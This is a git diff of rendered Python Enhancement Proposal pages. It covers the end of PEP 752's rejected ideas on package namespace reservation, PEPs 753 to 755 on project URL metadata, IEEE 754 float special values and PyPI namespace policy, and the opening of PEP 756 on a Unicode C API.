One solution to make this less disruptive for users would be to manually +maintain a list of trustworthy details (organization/user names, domain names, +email addresses, etc.). This could be discoverable by packages providing +entry points which package managers could learn to detect and which +corporate environments could install by default. This has the major downside of +not providing automatic guarantees which would limit the usefulness for the +average user who is more likely to be affected.

+

There are two ideas that could be used to provide automatic protection, which +could be based on PEP 740 attestations or a new mechanism for utilizing +third-party APIs that host the metadata.

+

First, each repository could offer a service that verifies the owner of a +package using whatever criteria they deem appropriate. After verification, the +repository would add the details to a dedicated package that would be installed +by default.

+

This would require dedicated maintenance which is unrealistic for most +repositories, even PyPI currently. It’s unclear how community projects without +the resources for something like a domain name would be supported. Critically, +this solution would cause extra confusion for users in the case of multiple +repositories as each might have their own verification processes, attestation +criteria and default package containing the verified details. It would be +challenging to get community buy-in of every package manager to be aware of +each repositories’ chosen verification package and install that by default +before dependency resolution.

+

Should digital attestations become the chosen mechanism, a downside is that +implementing this in custom package repositories would require a significant +amount of work. In the case of PyPI, the prerequisite work on +Trusted Publishing and then the PEP 740 implementation itself took the +equivalent of a full-time engineer one year whose time was paid for by a +corporate sponsor. Other organizations are unlikely to implement similar work +because simpler mechanisms make it possible to implement reproducible builds. +When everything is internally managed, attestations are also not very useful. +Community projects are unlikely to undertake this effort because they would +likely lack the resources to maintain the necessary infrastructure themselves +and moreover there are significant downsides to +encouraging dedicated package repositories.

+

The other idea would be to host provenance assertions externally and push more +logic client-side. A possible implementation might be to specify a provenance +API that could be hosted at a designated relative path like +/provenance. Projects on each repository could then be configured to point +to a particular domain and this information would be passed on to clients +during installation.

+

While this distributed approach does impose less of an infrastructure burden on +repositories, it has the potential to be a security risk. If an external +provenance API is compromised, it could lead to malicious packages being +installed. If an external API is down, it could lead to package installation +failing or package managers might only emit warnings in which case there is no +security benefit.

+

Additionally, this disadvantages community projects that do not have the +resources to maintain such an API. They could use free hosting solutions such +as what many do for documentation but they do not technically own the +infrastructure and they would be compromised should the generous offerings be +restricted.

+

Finally, while both of these theoretical approaches are not yet prescriptive, +they imply assertions at the artifact level which was already a +rejected idea.

+
+
+

Asserting Package Owner Names

+

This is about asserting that the package came from a specific organization or +user name. It’s quite similar to the +organization scoping idea except that a flat +namespace is the base assumption.

+

This would require modifications to the JSON API of each supported +repository and could be implemented by exposing extra metadata or as proper +provenance assertions.

+

As with the organization scoping idea, a new syntax would be required like +microsoft::azure-loganalytics where microsoft is the organization and +azure-loganalytics is the package. Although this plays well with the +existing flat namespace in comparison, it retains the critical downside of +being a disruption for the community with the number of changes required.

+

A unique downside is that names are an implementation detail of repositories. +On PyPI, the names of organizations are separate from user names so there is +potential for conflicts. In the case of multiple repositories, users might run +into cases of dependency confusion similar to the one at the end of the +Encourage Dedicated Package Repositories +rejected idea.

+

To ameliorate this, it was suggested that the syntax be expanded to also +include the expected repository URL like +microsoft@pypi.org::azure-loganalytics. This syntax or something like it +is so verbose that it could lead to user confusion, and even worse, frustration +should it gain increased adoption among those able to maintain dedicated +infrastructure (community projects would not benefit).

+

The expanded syntax is an attempt to standardize resolver behavior and +configuration within dependency specifiers. Not only would this be mandating +the UX of tools, it lacks precedent in package managers for language ecosystems +with or without the concept of package repositories. In such cases, the +resolver configuration is separate from the dependency definition.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
LanguageToolResolution behavior
RustCargoDependency resolution can be modified within +Cargo.toml using the the [patch] table.
JSYarnAlthough they have the concept of protocols (which are +similar to the URL schemes of our direct references), +users configure the resolutions field in the +package.json file.
JSnpmUsers can configure the overrides field in the +package.json file.
RubyBundlerThe Gemfile allows for specifying an +explicit source for a gem.
C#NuGetIt’s possible to override package versions by configuring +the Directory.Packages.props file.
PHPComposerThe composer.json file allows for specifying +repository sources for specific packages.
GogoThe go.mod file allows for specifying a replace +directive. Note that this is used for direct dependencies +as well as transitive dependencies.
+
+
+

Use Fixed Prefixes

+

The idea here would be to have one or more top-level fixed prefixes that are +used for namespace reservations:

+
    +
  • com-: Reserved for corporate organizations.
  • +
  • org-: Reserved for community organizations.
  • +
+

Organizations would then apply for a namespace prefixed by the type of their +organization.

+

This would cause perpetual disruption because when projects begin it is unknown +whether a user base will be large enough to warrant a namespace reservation. +Whenever that happens the project would have to be renamed which would put a +high maintenance burden on the project maintainers and would cause confusion +for users who have to learn a new way to reference the project’s packages. +The potential for this deterring projects from reserving namespaces at all is +high.

+

Another issue with this approach is that projects often have branding in mind +(example) and would be reluctant to change their package names.

+

It’s unrealistic to expect every company and project to voluntarily change +their existing and future package names.

+
+
+

Use DNS

+

The idea here is to add a new +metadata field to projects in the API called domain-authority. Repositories +would support a new endpoint for verifying the domain via HTTPS. Clients would +then support options to allow certain domains.

+

This does not solve the problem for the target audience who do not check where +their packages are coming from and is more about checking for the integrity of +uploads which is already supported in a more secure way by PEP 740.

+

Most projects do not have a domain and could not benefit from this, unfairly +favoring organizations that have the financial means to acquire one.

+
+
+
+

Open Issues

+

None at this time.

+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0752.rst

+

Last modified: 2024-11-15 21:57:25 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0753/index.html b/pep-0753/index.html new file mode 100644 index 00000000000..301634cc385 --- /dev/null +++ b/pep-0753/index.html @@ -0,0 +1,535 @@ + + + + + + + + PEP 753 – Uniform project URLs in core metadata | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 753 – Uniform project URLs in core metadata

+
+
Author:
+
William Woodruff <william at yossarian.net>, +Facundo Tuesca <facundo.tuesca at trailofbits.com>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
29-Aug-2024
+
Post-History:
+
26-Aug-2024, +03-Sep-2024
+
Resolution:
+
10-Oct-2024
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Well-known Project URLs in Metadata, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP recommends two discrete changes to the processing of core metadata by +indices (such as PyPI) and other core metadata consumers:

+
    +
  • Deprecation of the Home-page and Download-URL fields in favor of +their Project-URL equivalents;
  • +
  • A set of conventions for normalizing and +assigning semantics to Project-URL labels during consumer-side metadata +processing.
  • +
+
+
+

Rationale and Motivation

+

Python’s standard core metadata has gone +through many years of revisions, with various standardized milestone versions.

+

These revisions of the core metadata have introduced various mechanisms +for expressing a package’s relationship to external resources, via URLs:

+
    +
  1. Metadata 1.0 introduced Home-page, a single-use field containing +a URL to the distribution’s home page.
    Home-page: https://example.com/sampleproject
    +
    +
    +
  2. +
  3. Metadata 1.1 introduced Download-URL, a complementary single-use field +containing a URL suitable for downloading the current distribution.
    Download-URL: https://example.com/sampleproject/sampleproject-1.2.3.tar.gz
    +
    +
    +
  4. +
  5. Metadata 1.2 introduced Project-URL, a multiple-use field containing +a label-and-URL pair. Each label is free text conveying the URL’s semantics.
    Project-URL: Homepage, https://example.com/sampleproject
    +Project-URL: Download, https://example.com/sampleproject/sampleproject-1.2.3.tar.gz
    +Project-URL: Documentation, https://example.com/sampleproject/docs
    +
    +
    +
  6. +
+

Metadata 2.1, 2.2, and 2.3 leave the behavior of these fields as originally +specified.

+

Because Project-URL allows free text labels and is multiple-use, informal +conventions have arisen for representing the values of +Home-page and Download-URL within Project-URL instead.

+

These conventions have seen significant adoption, with PEP 621 explicitly +choosing to provide only a project.urls table rather than a +project.home-page field. From PEP 621’s rejected ideas:

+
+
While the core metadata supports it, having a single field for a project’s +URL while also supporting a full table seemed redundant and confusing.
+

This PEP exists to formalize the informal conventions that have arisen, as well +as explicitly document Home-page and Download-URL as deprecated in +favor of equivalent Project-URL representations.

+
+
+

Specification

+

This PEP proposes that Home-page and Download-URL be considered +deprecated. This deprecation has implications for both package metadata +producers (e.g. build backends and packaging tools) and package indices +(e.g. PyPI).

+
+

Metadata producers

+

This PEP stipulates the following for metadata producers:

+
    +
  • When generating metadata 1.2 or later, producers SHOULD emit only +Project-URL, and SHOULD NOT emit Home-page or Download-URL +fields.
  • +
+

These stipulations do not change the optionality of URL fields in core metadata. +In other words, producers MAY choose to omit Project-URL entirely +at their discretion.

+

This PEP does not propose the outright removal of support for Home-page +or Download-URL. However, see Future Considerations for +thoughts on how a new (as of yet unspecified) major core metadata version +could complete the deprecation cycle via removal of these deprecated fields.

+

Similarly, this PEP does not propose that metadata producers emit +normalized labels. Label normalization is performed +solely on the processing and consumption side (i.e. within indices and other +consumers of distribution metadata).

+
+
+

Package indices

+

This PEP stipulates the following for package indices:

+
    +
  • When interpreting a distribution’s metadata of version 1.2 or later +(e.g. for rendering on a web page), the index MUST prefer +Project-URL fields as a source of URLs over Home-page and +Download-URL, even if the latter are explicitly provided.
  • +
  • If a distribution’s metadata contains only the Home-page and +Download-URL fields, the index MAY choose to ignore those fields +and behave as though no URLs were provided in the metadata. In this case, +the index SHOULD present an appropriate warning or notification to +the uploading party.
      +
    • The mechanism for presenting this warning or notification is not +specified, since it will vary by index. By way of example, an index may +choose to present a warning in the HTTP response to an upload request, or +send an email or other notification to the maintainer(s) of the project.
    • +
    +
  • +
  • If a distribution’s metadata contains both sets of fields, the index MAY +choose to reject the distribution outright. However, this is +NOT RECOMMENDED until a future unspecified major metadata version +formally removes support for Home-page and Download-URL.
  • +
  • Any changes to the interpretation of metadata of version 1.2 or later that +result in previously recognized URLs no longer being recognized +SHOULD NOT be retroactively applied to previously uploaded packages.
  • +
+

These stipulations do not change the optionality of URL processing by indices. +In other words, an index that does not process URLs within uploaded +distributions may continue to ignore all URL fields entirely.

+

Similarly, these stipulations do not imply that the index should +persist any normalizations that it performs to a distribution’s metadata. +In other words, this PEP stipulates label normalization for the purpose +of user presentation, not for the purpose of modifying an uploaded distribution +or its “sidecar” PEP 658 metadata file.

+
+
+
+

Conventions for Project-URL labels

+

The deprecations proposed above require a formalization of the currently +informal relationship between Home-page, Download-URL, and their +Project-URL equivalents.

+

This formalization has two parts:

+
    +
  1. A set of rules for normalizing Project-URL labels during index-side +processing;
  2. +
  3. A set of “well-known” normalized label values that indices may specialize +URL presentation for.
  4. +
+
+

Label normalization

+

The core metadata specification stipulates that Project-URL labels are +free text, limited to 32 characters.

+

This PEP proposes adding the concept of a “normalized” label to the core +metadata specification. Label normalization is defined via the following +Python function:

+
import string
+def normalize_label(label: str) -> str:
+    chars_to_remove = string.punctuation + string.whitespace
+    removal_map = str.maketrans("", "", chars_to_remove)
+    return label.translate(removal_map).lower()
+
+
+

In plain language: a label is normalized by deleting all ASCII punctuation and +whitespace, and then converting the result to lowercase.

+

The following table shows examples of labels before (raw) and after +normalization:

+ + + + + + + + + + + + + + + + + + + + + + + +
RawNormalized
Homepagehomepage
Home-pagehomepage
Home pagehomepage
Change_Logchangelog
What's New?whatsnew
+

When processing distribution metadata, package indices SHOULD perform +label normalization to determine if a given label is +well known for subsequent special processing. +Labels that are not well-known MUST be processed in their un-normalized +form.

+

Normalization does not change pre-existing semantics around duplicated +Project-URL labels. In other words, normalization may result in duplicate +labels in the project’s metadata, but only in the same manner that was already permitted +(since the core metadata specification does +not stipulate that labels are unique).

+

Excerpted examples of normalized metadata fields are provided in +Appendix A.

+
+
+

Well-known labels

+

In addition to the normalization rules above, this PEP proposes a +fixed (but extensible) set of “well-known” Project-URL labels, +as well as aliases and human-readable equivalents.

+

The following table lists these labels, in normalized form:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Label (Human-readable equivalent)DescriptionAliases
homepage (Homepage)The project’s home page(none)
source (Source Code)The project’s hosted source code or repositoryrepository, sourcecode, github
download (Download)A download URL for the current distribution, equivalent to Download-URL(none)
changelog (Changelog)The project’s comprehensive changelogchanges, whatsnew, history
releasenotes (Release Notes)The project’s curated release notes(none)
documentation (Documentation)The project’s online documentationdocs
issues (Issue Tracker)The project’s bug trackerbugs, issue, tracker, issuetracker, bugtracker
funding (Funding)Funding Informationsponsor, donate, donation
+

Indices MAY choose to use the human-readable equivalents suggested above +in their UI elements, if appropriate. Alternatively, indices MAY choose +their own appropriate human-readable equivalents for UI elements.

+

Packagers and metadata producers MAY choose to use any label that normalizes +to these labels (or their aliases) to communicate specific URL intents to +package indices and downstreams.

+

Similarly, indices MAY choose to specialize their rendering or presentation +of URLs with these labels, e.g. by presenting an appropriate icon or tooltip +for each label.

+

Indices MAY also specialize the rendering or presentation of additional +labels or URLs, including (but not limited to), labels that start with a +well-known label, and URLs that refer to a known service provider domain (e.g. +for documentation hosting or issue tracking).

+

This PEP recognizes that the list of well-known labels is unlikely to remain +static, and that subsequent additions to it should not require the overhead +associated with a formal PEP process or new metadata version. As such, +this PEP proposes that the list above become a “living” list within +the PyPA specifications.

+
+
+
+

Backwards Compatibility

+
+

Limited Impact

+

This PEP is expected to have little to no impact on existing packaging tooling +or package indices:

+
    +
  • Packaging tooling: no changes to the correctness or well-formedness +of the core metadata. This PEP proposes deprecations as well as behavioral +refinements, but all currently (and historically) produced metadata will +continue to be valid per the rules of its respective version.
  • +
  • Package indices: indices will continue to expect well-formed core metadata, +with no behavioral changes. Indices MAY choose to emit warnings or +notifications on the presence of now-deprecated fields, +per above.
  • +
+
+
+
+

Future Considerations

+

This PEP does not stipulate or require any future metadata changes.

+

However, per Metadata producers and Conventions for Project-URL labels, +we identify the following potential future goals for a new major release of +the core metadata standards:

+
    +
  • Outright removal of support for Home-page and Download-URL in the +next major core metadata version. If removed, package indices and consumers +MUST reject metadata containing these fields when said metadata is of +the new major version.
  • +
  • Enforcement of label normalization. If enforced, package producers +MUST emit only normalized Project-URL labels when generating +distribution metadata, and package indices and consumers MUST reject +distributions containing non-normalized labels. Note: requiring +normalization merely restricts labels to lowercase text, and excludes +whitespace and punctuation. It does NOT restrict project URLs solely to +the use of “well-known” labels.
  • +
+

These potential changes would be backwards incompatible, hence their +inclusion only in this section. Acceptance of this PEP does NOT commit +any future metadata revision to actually making these changes.

+
+
+

Security Implications

+

This PEP does not identify any positive or negative security implications +associated with deprecating Home-page and Download-URL or with +label normalization.

+
+
+

How To Teach This

+

The changes in this PEP should be transparent to the majority of the packaging +ecosystem’s userbase; the primary beneficiaries of this PEP’s changes are +packaging tooling authors and index maintainers, who will be able to reduce the +number of unique URL fields produced and checked.

+

A small number of package maintainers may observe new warnings or notifications +from their index of choice, should the index choose to ignore Home-page +and Download-URL as suggested. Similarly, a small number of package +maintainers may observe that their index of choice no longer renders +their URLs, if only present in the deprecated fields. However, no package +maintainers should observe rejected package uploads or other breaking +changes to packaging workflows due to this PEP’s proposed changes.

+

Anybody who observes warnings or changes to the presentation of +URLs on indices can be taught about this PEP’s behavior via official +packaging resources, such as the +Python Packaging User Guide +and PyPI’s user documentation, the latter of which +already contains an informal description of PyPI’s URL handling behavior.

+

If this PEP is accepted, the authors of this PEP will coordinate to update +and cross-link the resources mentioned above.

+
+
+

Appendix A: Label normalization examples

+

This appendix provides an illustrative excerpt of a distribution’s +metadata, before and after index-side processing:

+

Before:

+
Project-URL: Home-page, https://example.com
+Project-URL: Homepage, https://another.example.com
+Project-URL: Source, https://github.com/example/example
+Project-URL: GitHub, https://github.com/example/example
+Project-URL: Another Service, https://custom.example.com
+
+
+

After:

+
Project-URL: homepage, https://example.com
+Project-URL: homepage, https://another.example.com
+Project-URL: source, https://github.com/example/example
+Project-URL: github, https://github.com/example/example
+Project-URL: Another Service, https://custom.example.com
+
+
+

In particular, observe:

+
    +
  • Normalized duplicates are preserved (both Home-page and Homepage +become homepage);
  • +
  • Source and GitHub are both normalized into their respective forms, +but github is not transformed into source.
  • +
  • Another Service is not normalized, since its normal form +(anotherservice) is not a well-known label.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0753.rst

+

Last modified: 2024-10-30 06:11:26 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0754/index.html b/pep-0754/index.html new file mode 100644 index 00000000000..5b924e98a36 --- /dev/null +++ b/pep-0754/index.html @@ -0,0 +1,314 @@ + + + + + + + + PEP 754 – IEEE 754 Floating Point Special Values | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 754 – IEEE 754 Floating Point Special Values

+
+
Author:
+
Gregory R. Warnes <gregory_r_warnes at groton.pfizer.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
28-Mar-2003
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected. After sitting open for four years, it has +failed to generate sufficient community interest.

+

Several ideas of this PEP were implemented for Python 2.6. float('inf') +and repr(float('inf')) are now guaranteed to work on every supported +platform with IEEE 754 semantics. However the eval(repr(float('inf'))) +roundtrip is still not supported unless you define inf and nan yourself:

+
>>> inf = float('inf')
+>>> inf, 1E400
+(inf, inf)
+>>> neginf = float('-inf')
+>>> neginf, -1E400
+(-inf, -inf)
+>>> nan = float('nan')
+>>> nan, inf * 0.
+(nan, nan)
+
+
+

The math and the sys module also have gained additional features, +sys.float_info, math.isinf, math.isnan, math.copysign.

+
+
+

Abstract

+

This PEP proposes an API and a provides a reference module that +generates and tests for IEEE 754 double-precision special values: +positive infinity, negative infinity, and not-a-number (NaN).

+
+
+

Rationale

+

The IEEE 754 standard defines a set of binary representations and +algorithmic rules for floating point arithmetic. Included in the +standard is a set of constants for representing special values, +including positive infinity, negative infinity, and indeterminate or +non-numeric results (NaN). Most modern CPUs implement the +IEEE 754 standard, including the (Ultra)SPARC, PowerPC, and x86 +processor series.

+

Currently, the handling of IEEE 754 special values in Python depends +on the underlying C library. Unfortunately, there is little +consistency between C libraries in how or whether these values are +handled. For instance, on some systems “float(‘Inf’)” will properly +return the IEEE 754 constant for positive infinity. On many systems, +however, this expression will instead generate an error message.

+

The output string representation for an IEEE 754 special value also +varies by platform. For example, the expression “float(1e3000)”, +which is large enough to generate an overflow, should return a string +representation corresponding to IEEE 754 positive infinity. Python +2.1.3 on x86 Debian Linux returns “inf”. On Sparc Solaris 8 with +Python 2.2.1, this same expression returns “Infinity”, and on +MS-Windows 2000 with Active Python 2.2.1, it returns “1.#INF”.

+

Adding to the confusion, some platforms generate one string on +conversion from floating point and accept a different string for +conversion to floating point. On these systems

+
float(str(x))
+
+
+

will generate an error when “x” is an IEEE special value.

+

In the past, some have recommended that programmers use expressions +like:

+
PosInf = 1e300**2
+NaN = PosInf/PosInf
+
+
+

to obtain positive infinity and not-a-number constants. However, the +first expression generates an error on current Python interpreters. A +possible alternative is to use:

+
PosInf = 1e300000
+NaN = PosInf/PosInf
+
+
+

While this does not generate an error with current Python +interpreters, it is still an ugly and potentially non-portable hack. +In addition, defining NaN in this way does solve the problem of +detecting such values. First, the IEEE 754 standard provides for an +entire set of constant values for Not-a-Number. Second, the standard +requires that

+
NaN != X
+
+
+

for all possible values of X, including NaN. As a consequence

+
NaN == NaN
+
+
+

should always evaluate to false. However, this behavior also is not +consistently implemented. [e.g. Cygwin Python 2.2.2]

+

Due to the many platform and library inconsistencies in handling IEEE +special values, it is impossible to consistently set or detect IEEE +754 floating point values in normal Python code without resorting to +directly manipulating bit-patterns.

+

This PEP proposes a standard Python API and provides a reference +module implementation which allows for consistent handling of IEEE 754 +special values on all supported platforms.

+
+
+

API Definition

+
+

Constants

+
+
NaN
Non-signalling IEEE 754 “Not a Number” value
+
PosInf
IEEE 754 Positive Infinity value
+
NegInf
IEEE 754 Negative Infinity value
+
+
+
+

Functions

+
+
isNaN(value)
Determine if the argument is an IEEE 754 NaN (Not a Number) value.
+
isPosInf(value)
Determine if the argument is an IEEE 754 positive infinity value.
+
isNegInf(value)
Determine if the argument is an IEEE 754 negative infinity value.
+
isFinite(value)
Determine if the argument is a finite IEEE 754 value (i.e., is +not NaN, positive, or negative infinity).
+
isInf(value)
Determine if the argument is an infinite IEEE 754 value (positive +or negative infinity)
+
+
+
+

Example

+

(Run under Python 2.2.1 on Solaris 8.)

+
>>> import fpconst
+>>> val = 1e30000 # should be cause overflow and result in "Inf"
+>>> val
+Infinity
+>>> fpconst.isInf(val)
+1
+>>> fpconst.PosInf
+Infinity
+>>> nval = val/val # should result in NaN
+>>> nval
+NaN
+>>> fpconst.isNaN(nval)
+1
+>>> fpconst.isNaN(val)
+0
+
+
+
+
+

Implementation

+

The reference implementation is provided in the module “fpconst” [1], +which is written in pure Python by taking advantage of the “struct” +standard module to directly set or test for the bit patterns that +define IEEE 754 special values. Care has been taken to generate +proper results on both big-endian and little-endian machines. The +current implementation is pure Python, but some efficiency could be +gained by translating the core routines into C.

+

Patch 1151323 “New fpconst module” [2] on SourceForge adds the +fpconst module to the Python standard library.

+
+
+
+

References

+

See http://babbage.cs.qc.edu/courses/cs341/IEEE-754references.html for +reference material on the IEEE 754 floating point standard.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0754.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0755/index.html b/pep-0755/index.html new file mode 100644 index 00000000000..7dca4cebe53 --- /dev/null +++ b/pep-0755/index.html @@ -0,0 +1,427 @@ + + + + + + + + PEP 755 – Implicit namespace policy for PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 755 – Implicit namespace policy for PyPI

+
+
Author:
+
Ofek Lev <ofekmeister at gmail.com>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Dustin Ingram <di at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
05-Sep-2024
+
Post-History:
+
07-Sep-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP codifies an implementation of PEP 752 for PyPI [1].

+
+
+

Motivation

+

Many projects and communities would benefit from the ability to reserve +namespaces. Since PyPI exists to serve the Python community, it is critical +to gather feedback to ensure that everyone’s needs are met.

+

A dedicated PEP is required because the operational and policy nuances are up +to each package repository to decide.

+
+
+

Rationale

+

PyPI has been understaffed, receiving the first dedicated specialist in +July 2024. Due to lack of resources, user support has been lacking for +package name claims, +organization requests, +storage limit increases, +and even account recovery.

+

The default policy of giving paid organizations more +leniency when reserving namespaces provides the following benefits:

+
    +
  • PyPI would have a constant source of funding for support specialists, +infrastructure maintenance, bug fixes and new features.
  • +
  • Although each application would require independent review, less human +feedback would be required because the process to approve a paid organization +already bestows a certain amount of trust.
  • +
+
+
+

Terminology

+
+
Paid/Corporate Organization
Corporate organizations are organizations +that pay for special functionality on PyPI. This PEP refers to them as +paid in most circumstances for brevity and to ease understanding for +non-native speakers.
+
Root Grant
A grant as defined by PEP 752 terminology.
+
Child Grant
A grant created from a root grant with the associated namespace being a +child namespace as defined by PEP 752 terminology.
+
+
+
+

Implementation

+
+

Grant Applications

+
+

Submission

+

Only organization (non-user) accounts have access to the grant application +form.

+

Applications for paid organizations receive priority in the reviewing queue. +This is both to offer a meaningful benefit to paid organizations and to ensure +that funding is available for PyPI’s operational costs, including more +reviewers.

+
+
+

Approval Criteria

+
    +
  1. The namespace must not be something common like tool or apps.
  2. +
  3. The namespace should be greater than three characters.
  4. +
  5. The namespace should properly and clearly identify the reservation owner.
  6. +
  7. The organization should be actively using the namespace.
  8. +
  9. There should be evidence that not reserving the namespace may cause +ambiguity, confusion, or other harm to the community.
  10. +
+

Organizations that are not paid organizations will represent one of the +following:

+
    +
  • Large, popular open-source projects with many packages
  • +
  • Universities that actively publish packages
  • +
  • Government organizations that actively publish packages
  • +
  • NPOs/NGOs that actively publish packages like +Our World in Data
  • +
+

Generally speaking, reviewers should be more tolerant of paid organizations +that apply for grants for which they are not yet using.

+

For example, while it’s reasonable to grant a namespace to a startup or an +existing company with a new product line, it’s not as reasonable to grant a +namespace to a community project that doesn’t have many users.

+
+
+

Rejections

+

Rejected applications will receive clear rationale for the decision based on +the approval criteria. Applications rejected due to the namespace being too +common will be persisted internally for future reviewers to reference and new +applications attempting to reserve a namespace that was previously rejected +for that reason will display a warning.

+
+
+

Acceptance

+

When an application is accepted for a namespace that is used by projects +outside of the organization, an email will be sent to the owners of the +projects notifying them of the new grant. The email will contain a link to the +namespace’s page.

+
+
+
+

Grant Types

+

There are two types of grants.

+
+

Root Grant

+

An organization gets a root grant for every approved application. This grant +may produce any number of child grants.

+
+
+

Child Grant

+

A child grant may be created by the owner of a root grant at +any time without approval. The namespace associated with such grants must be a +child namespace of the root grant’s namespace.

+

Child grants cannot have their own child grants.

+
+
+
+

Grant Ownership

+

The owner of a grant may allow any number of other organizations to use the +grant. The grants behave as if they were owned by the organization. The owner +may revoke this permission at any time.

+

The owner may transfer ownership to another organization at any time without +approval from PyPI admins. If the organization is a paid organization, the +target for transfer must also be a paid organization. Settings for permitted +organizations are transferred as well.

+
+
+

User Interface

+
+

Namespace Page

+

The namespace of every active grant will have its own page that has information +such as its open status, the current owners, the +time at which ownership was granted and the total number of projects that match +the namespace.

+
+
+

Project Page

+

Every project’s page +(example) that +matches an active namespace grant will indicate what the prefix is (NuGet +currently does not do this) and will stand out as a pill or label. This value +will match the prefix key in the +namespace detail API.

+

Clicking on the namespace will take the user to +its page.

+
+
+

Visual Indicators

+

For projects that match an active namespace grant, users will be able to +quickly ascertain which of the following scenarios apply:

+
    +
  1. Projects that are tied to a grant owner will not have +a visual indicator and users should solely rely on the always-present +prefix.
  2. +
  3. Projects that are not tied to a grant owner and the +matching grant is open will have a unique +indicator that does not convey mistrust or danger. A good choice might be +the users icon from Font Awesome or +the groups icon from Google Fonts.
  4. +
  5. Projects that are not tied to a grant owner and the +matching grant is restricted will have a unique visual indicator. This +situation arises when the project existed before the grant was created. +The indicator will convey inauthenticity or lack of trust. A good choice +might be a warning sign (⚠).
  6. +
+
+
+
+

Open Namespaces

+

When a child grant is created, its +open status will be inherited from the +root grant. Owners of child grants may make them open at any +time. If a grant is open, it cannot be made restricted unless the owner of the +grant is the owner of every project that matches the namespace.

+
+
+

Grant Removal

+

If a grant is shared with other organizations, the owner organization must +initiate a transfer as a prerequisite for organization deletion.

+

If a grant is not shared, the owner may unclaim the namespace in either of the +following circumstances:

+
    +
  • The organization manually removes themselves as the owner.
  • +
  • The organization is deleted.
  • +
+

When a reserved namespace becomes unclaimed, the UI will +reflect this such that matching projects will no longer have any indicators on +their page nor will the namespace have a dedicated page.

+
+
+
+

How to Teach This

+

For organizations, we will document how to reserve namespaces, what the +benefits are and pricing.

+

We will document PEP 541 on the same pages so that organizations are aware +of the main mechanism to report improper uses of existing packages matching +their grants.

+
+
+

Rejected Ideas

+
+

Page for Viewing All Active Grants

+

There is no page to view all active namespace grants because this has the +potential to leak private information such as upcoming products.

+
+
+

Visual Indicator for Owned Projects

+

There is no indicator for projects that are tied to a +grant owner primarily to reduce clutter, especially since +this is the most common scenario.

+

If there was an indicator, it would not be a check mark or similar as NuGet +chose because it may mistakingly convey that there are associated security +guarantees inherent to the use of the package. Additionally, some social media +platforms use a check mark for verified users which may cause confusion.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0755.rst

+

Last modified: 2024-09-16 20:31:00 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0756/index.html b/pep-0756/index.html new file mode 100644 index 00000000000..5a30d09c76e --- /dev/null +++ b/pep-0756/index.html @@ -0,0 +1,564 @@ + + + + + + + + PEP 756 – Add PyUnicode_Export() and PyUnicode_Import() C functions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 756 – Add PyUnicode_Export() and PyUnicode_Import() C functions

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
PEP-Delegate:
+
C API Working Group
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
13-Sep-2024
+
Python-Version:
+
3.14
+
Post-History:
+
14-Sep-2024
+
Resolution:
+
29-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add functions to the limited C API version 3.14:

+
    +
  • PyUnicode_Export(): export a Python str object as a Py_buffer +view.
  • +
  • PyUnicode_Import(): import a Python str object.
  • +
+

On CPython, PyUnicode_Export() has an O(1) complexity: no memory +is copied and no conversion is done.

+
+
+

Rationale

+
+

PEP 393

+

PEP 393 “Flexible String Representation” changed string internals in +Python 3.3 to use three formats:

+
    +
  • PyUnicode_1BYTE_KIND: Unicode range [U+0000; U+00ff], +UCS-1, 1 byte/character.
  • +
  • PyUnicode_2BYTE_KIND: Unicode range [U+0000; U+ffff], +UCS-2, 2 bytes/character.
  • +
  • PyUnicode_4BYTE_KIND: Unicode range [U+0000; U+10ffff], +UCS-4, 4 bytes/character.
  • +
+

A Python str object must always use the most compact format. For +example, a string which only contains ASCII characters must use the +UCS-1 format.

+

The PyUnicode_KIND() function can be used to know the format used by +a string.

+

One of the following functions can be used to access data:

+
    +
